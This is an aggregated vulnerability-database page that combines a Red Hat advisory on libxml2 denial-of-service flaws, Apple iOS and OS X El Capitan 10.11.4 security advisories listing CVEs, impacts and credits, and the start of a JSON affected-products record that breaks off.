Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
The libxml2 library is a development toolbox providing the implementation of various XML standards.
Several denial of service flaws were found in libxml2, a library providing support for reading, modifying, and writing XML and HTML files. A remote attacker could provide a specially crafted XML or HTML file that, when processed by an application using libxml2, would cause that application to use an excessive amount of CPU, leak potentially sensitive information, or in certain cases crash the application. (CVE-2015-1819, CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500 CVE-2015-7941, CVE-2015-7942, CVE-2015-8241, CVE-2015-8242, CVE-2015-8317, BZ#1213957, BZ#1281955)
Red Hat would like to thank the GNOME project for reporting CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-8241, CVE-2015-8242, and CVE-2015-8317. Upstream acknowledges Kostya Serebryany of Google as the original reporter of CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, and CVE-2015-7500; Hugh Davenport as the original reporter of CVE-2015-8241 and CVE-2015-8242; and Hanno Boeck as the original reporter of CVE-2015-8317.
All libxml2 users are advised to upgrade to these updated packages, which contain a backported patch to correct these issues. The desktop must be restarted (log out, then log back in) for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
1211278 - CVE-2015-1819 libxml2: denial of service processing a crafted XML document 1213957 - libxml2: out-of-bounds memory access when parsing an unclosed HTML comment 1274222 - CVE-2015-7941 libxml2: Out-of-bounds memory access 1276297 - CVE-2015-7942 libxml2: heap-based buffer overflow in xmlParseConditionalSections() 1276693 - CVE-2015-5312 libxml2: CPU exhaustion when processing specially crafted XML input 1281862 - CVE-2015-7497 libxml2: Heap-based buffer overflow in xmlDictComputeFastQKey 1281879 - CVE-2015-7498 libxml2: Heap-based buffer overflow in xmlParseXmlDecl 1281925 - CVE-2015-7499 libxml2: Heap-based buffer overflow in xmlGROW 1281930 - CVE-2015-8317 libxml2: Out-of-bounds heap read when parsing file with unfinished xml declaration 1281936 - CVE-2015-8241 libxml2: Buffer overread with XML parser in xmlNextChar 1281943 - CVE-2015-7500 libxml2: Heap buffer overflow in xmlParseMisc 1281950 - CVE-2015-8242 libxml2: Buffer overread with HTML parser in push mode in xmlSAX2TextNode 1281955 - libxml2: Multiple out-of-bounds reads in xmlDictComputeFastKey.isra.2 and xmlDictAddString.isra.O
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: libxml2-2.9.1-6.el7_2.2.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.2.i686.rpm libxml2-2.9.1-6.el7_2.2.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-python-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.2.i686.rpm libxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm libxml2-static-2.9.1-6.el7_2.2.i686.rpm libxml2-static-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: libxml2-2.9.1-6.el7_2.2.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.2.i686.rpm libxml2-2.9.1-6.el7_2.2.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-python-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.2.i686.rpm libxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm libxml2-static-2.9.1-6.el7_2.2.i686.rpm libxml2-static-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: libxml2-2.9.1-6.el7_2.2.src.rpm
aarch64: libxml2-2.9.1-6.el7_2.2.aarch64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.aarch64.rpm libxml2-devel-2.9.1-6.el7_2.2.aarch64.rpm libxml2-python-2.9.1-6.el7_2.2.aarch64.rpm
ppc64: libxml2-2.9.1-6.el7_2.2.ppc.rpm libxml2-2.9.1-6.el7_2.2.ppc64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.ppc.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.ppc64.rpm libxml2-devel-2.9.1-6.el7_2.2.ppc.rpm libxml2-devel-2.9.1-6.el7_2.2.ppc64.rpm libxml2-python-2.9.1-6.el7_2.2.ppc64.rpm
ppc64le: libxml2-2.9.1-6.el7_2.2.ppc64le.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.ppc64le.rpm libxml2-devel-2.9.1-6.el7_2.2.ppc64le.rpm libxml2-python-2.9.1-6.el7_2.2.ppc64le.rpm
s390x: libxml2-2.9.1-6.el7_2.2.s390.rpm libxml2-2.9.1-6.el7_2.2.s390x.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.s390.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.s390x.rpm libxml2-devel-2.9.1-6.el7_2.2.s390.rpm libxml2-devel-2.9.1-6.el7_2.2.s390x.rpm libxml2-python-2.9.1-6.el7_2.2.s390x.rpm
x86_64: libxml2-2.9.1-6.el7_2.2.i686.rpm libxml2-2.9.1-6.el7_2.2.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.2.i686.rpm libxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm libxml2-python-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64: libxml2-debuginfo-2.9.1-6.el7_2.2.aarch64.rpm libxml2-static-2.9.1-6.el7_2.2.aarch64.rpm
ppc64: libxml2-debuginfo-2.9.1-6.el7_2.2.ppc.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.ppc64.rpm libxml2-static-2.9.1-6.el7_2.2.ppc.rpm libxml2-static-2.9.1-6.el7_2.2.ppc64.rpm
ppc64le: libxml2-debuginfo-2.9.1-6.el7_2.2.ppc64le.rpm libxml2-static-2.9.1-6.el7_2.2.ppc64le.rpm
s390x: libxml2-debuginfo-2.9.1-6.el7_2.2.s390.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.s390x.rpm libxml2-static-2.9.1-6.el7_2.2.s390.rpm libxml2-static-2.9.1-6.el7_2.2.s390x.rpm
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-static-2.9.1-6.el7_2.2.i686.rpm libxml2-static-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: libxml2-2.9.1-6.el7_2.2.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.2.i686.rpm libxml2-2.9.1-6.el7_2.2.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.2.i686.rpm libxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm libxml2-python-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-static-2.9.1-6.el7_2.2.i686.rpm libxml2-static-2.9.1-6.el7_2.2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-1819 https://access.redhat.com/security/cve/CVE-2015-5312 https://access.redhat.com/security/cve/CVE-2015-7497 https://access.redhat.com/security/cve/CVE-2015-7498 https://access.redhat.com/security/cve/CVE-2015-7499 https://access.redhat.com/security/cve/CVE-2015-7500 https://access.redhat.com/security/cve/CVE-2015-7941 https://access.redhat.com/security/cve/CVE-2015-7942 https://access.redhat.com/security/cve/CVE-2015-8241 https://access.redhat.com/security/cve/CVE-2015-8242 https://access.redhat.com/security/cve/CVE-2015-8317 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFWZZK6XlSAg2UNWIIRAlx5AKCfIxP9TLM+V/vmQq6MVeUpjiGltgCgnOgZ IOmptwborGrgz5fLqra3STg= =bVgd -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . CVE-ID CVE-2016-1781 : Devdatta Akhawe of Dropbox, Inc.
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A website may be able to track sensitive user information Description: A hidden web page may be able to access device- orientation and device-motion data. This issue was addressed by suspending the availability of this data when the web view is hidden. CVE-ID CVE-2016-1780 : Maryam Mehrnezhad, Ehsan Toreini, Siamak F. Shahandashti, and Feng Hao of the School of Computing Science, Newcastle University, UK
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may reveal a user's current location Description: An issue existed in the parsing of geolocation requests. CVE-ID CVE-2016-1779 : xisigr of Tencent's Xuanwu Lab (http://www.tencent.com)
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious website may be able to access restricted ports on arbitrary servers Description: A port redirection issue was addressed through additional port validation. CVE-ID CVE-2016-1782 : Muneaki Nishimura (nishimunea) of Recruit Technologies Co.,Ltd. CVE-ID CVE-2016-1784 : Moony Li and Jack Tang of TrendMicro and 李普君 of 无声信息技术PKAV Team (PKAV.net)
WebKit Page Loading Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a malicious website may lead to user interface spoofing Description: Redirect responses may have allowed a malicious website to display an arbitrary URL and read cached contents of the destination origin. CVE-ID CVE-2016-1786 : ma.la of LINE Corporation
WebKit Page Loading Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious website may exfiltrate data cross-origin Description: A caching issue existed with character encoding. CVE-ID CVE-2016-0801 : an anonymous researcher CVE-2016-0802 : an anonymous researcher
Installation note:
This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
- Navigate to Settings
- Select General
- Select About. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002
OS X El Capitan 10.11.4 and Security Update 2016-002 is now available and addresses the following:
apache_mod_php Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš
AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team
AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team
AppleUSBNetworking Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of data from USB devices. This issue was addressed through improved input validation. CVE-ID CVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path
Bluetooth Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1735 : Jeonghoon Shin@A.D.D CVE-2016-1736 : beist and ABH of BoB
Carbon Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2016-1737 : an anonymous researcher
dyld Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker may tamper with code-signed applications to execute arbitrary code in the application's context Description: A code signing verification issue existed in dyld. This issue was addressed with improved validation. CVE-ID CVE-2016-1738 : beist and ABH of BoB
FontParser Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with Trend Micro's Zero Day Initiative (ZDI)
HTTPProtocol Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to execute arbitrary code Description: Multiple vulnerabilities existed in nghttp2 versions prior to 1.6.0, the most serious of which may have led to remote code execution. These were addressed by updating nghttp2 to version 1.6.0. CVE-ID CVE-2015-8659
Intel Graphics Driver Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1743 : Piotr Bania of Cisco Talos CVE-2016-1744 : Ian Beer of Google Project Zero
IOFireWireFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to cause a denial of service Description: A null pointer dereference was addressed through improved validation. CVE-ID CVE-2016-1745 : sweetchip of Grayhash
IOGraphics Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
IOHIDFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1748 : Brandon Azad
IOUSBFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed through improved memory management. CVE-ID CVE-2016-1750 : CESG
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition existed during the creation of new processes. This was addressed through improved state handling. CVE-ID CVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-ID CVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team
Kernel Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2016-1755 : Ian Beer of Google Project Zero CVE-2016-1759 : lokihardt
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1758 : Brandon Azad
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple integer overflows were addressed through improved input validation. CVE-ID CVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to cause a denial of service Description: A denial of service issue was addressed through improved validation. CVE-ID CVE-2016-1752 : CESG
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2015-1819 CVE-2015-5312 : David Drysdale of Google CVE-2015-7499 CVE-2015-7500 : Kostya Serebryany of Google CVE-2015-7942 : Kostya Serebryany of Google CVE-2015-8035 : gustavo.grieco CVE-2015-8242 : Hugh Davenport CVE-2016-1761 : wol0xff working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1762
Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker who is able to bypass Apple's certificate pinning, intercept TLS connections, inject messages, and record encrypted attachment-type messages may be able to read attachments Description: A cryptographic issue was addressed by rejecting duplicate messages on the client. CVE-ID CVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk, Ian Miers, and Michael Rushanan of Johns Hopkins University
Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a JavaScript link can reveal sensitive user information Description: An issue existed in the processing of JavaScript links. This issue was addressed through improved content security policy checks. CVE-ID CVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of Bishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox
NVIDIA Graphics Drivers Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1741 : Ian Beer of Google Project Zero
OpenSSH Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Connecting to a server may leak sensitive user information, such as a client's private keys Description: Roaming, which was on by default in the OpenSSH client, exposed an information leak and a buffer overflow. These issues were addressed by disabling roaming in the client. CVE-ID CVE-2016-0777 : Qualys CVE-2016-0778 : Qualys
OpenSSH Available for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5 Impact: Multiple vulnerabilities in LibreSSL Description: Multiple vulnerabilities existed in LibreSSL versions prior to 2.1.8. These were addressed by updating LibreSSL to version 2.1.8. CVE-ID CVE-2015-5333 : Qualys CVE-2015-5334 : Qualys
OpenSSL Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to cause a denial of service Description: A memory leak existed in OpenSSL versions prior to 0.9.8zh. This issue was addressed by updating OpenSSL to version 0.9.8zh. CVE-ID CVE-2015-3195
Python Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2014-9495 CVE-2015-0973 CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš
QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted FlashPix Bitmap Image may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1767 : Francis Provencher from COSIG CVE-2016-1768 : Francis Provencher from COSIG
QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted Photoshop document may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1769 : Francis Provencher from COSIG
Reminders Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a tel link can make a call without prompting the user Description: A user was not prompted before invoking a call. This was addressed through improved entitlement checks. CVE-ID CVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of Laurent.ca
Ruby Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: An unsafe tainted string usage vulnerability existed in versions prior to 2.0.0-p648. This issue was addressed by updating to version 2.0.0-p648. CVE-ID CVE-2015-7551
Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to check for the existence of arbitrary files Description: A permissions issue existed in code signing tools. This was addressed though additional ownership checks. CVE-ID CVE-2016-1773 : Mark Mentovai of Google Inc.
Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution Description: A memory corruption issue existed in the ASN.1 decoder. This issue was addressed through improved input validation. CVE-ID CVE-2016-1950 : Francis Gabriel of Quarkslab
Tcl
Available for:
OS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3
Impact: Processing a maliciously crafted .png file may lead to
arbitrary code execution
Description: Multiple vulnerabilities existed in libpng versions
prior to 1.6.20. These were addressed by removing libpng.
CVE-ID
CVE-2015-8126 : Adam Mariš
TrueTypeScaler Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2016-1775 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI)
Wi-Fi Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker with a privileged network position may be able to execute arbitrary code Description: A frame validation and memory corruption issue existed for a given ethertype. This issue was addressed through additional ethertype validation and improved memory handling. CVE-ID CVE-2016-0801 : an anonymous researcher CVE-2016-0802 : an anonymous researcher
OS X El Capitan 10.11.4 includes the security content of Safari 9.1. https://support.apple.com/kb/HT206171
OS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6 ARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w HiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l Jy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau /71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi UhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng O+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78 juPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF i9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP Izo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X qlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q VZmOKa8qMxB1L/JmdCqy =mZR+ -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201511-0037", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ubuntu linux", "scope": "eq", "trust": 1.6, "vendor": "canonical", "version": "15.10" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.6, "vendor": "canonical", "version": "15.04" }, { "model": "icewall file manager", "scope": "eq", "trust": 1.3, "vendor": "hp", "version": "3.0" }, { "model": "icewall federation agent", "scope": "eq", "trust": 1.3, "vendor": "hp", "version": "3.0" }, { "model": "libxml2", "scope": "eq", "trust": 1.3, "vendor": "xmlsoft", "version": "2.9.2" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "tvos", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "9.1" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "watchos", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "2.1" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.04" }, { "model": "mac os x", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "10.11.3" }, { "model": "iphone os", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "9.2.1" }, { "model": "ubuntu", "scope": "eq", "trust": 0.8, "vendor": "canonical", "version": "12.04 lts" }, { "model": "ubuntu", "scope": "eq", "trust": 0.8, "vendor": "canonical", "version": "14.04 lts" }, { "model": "ubuntu", "scope": "eq", "trust": 0.8, "vendor": "canonical", "version": "15.04" }, { "model": "ubuntu", "scope": "eq", "trust": 0.8, "vendor": "canonical", "version": "15.10" }, { "model": "libxml2", "scope": null, "trust": 0.8, "vendor": "xmlsoft", "version": null }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.10.5" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.11 to 10.11.3" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.9.5" }, { "model": "ios", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "9.3 (ipad 2 or later )" }, { "model": "ios", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "9.3 (iphone 4s or later )" }, { "model": "ios", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "9.3 (ipod touch first 5 after generation )" }, { "model": "tvos", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "9.2 (apple tv first 4 generation )" }, { "model": "watchos", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "2.2 (apple watch edition)" }, { "model": "watchos", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "2.2 (apple watch hermes)" }, { "model": "watchos", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "2.2 (apple watch sport)" }, { "model": "watchos", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "2.2 (apple watch)" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.3.10" }, { "model": "libxml2", 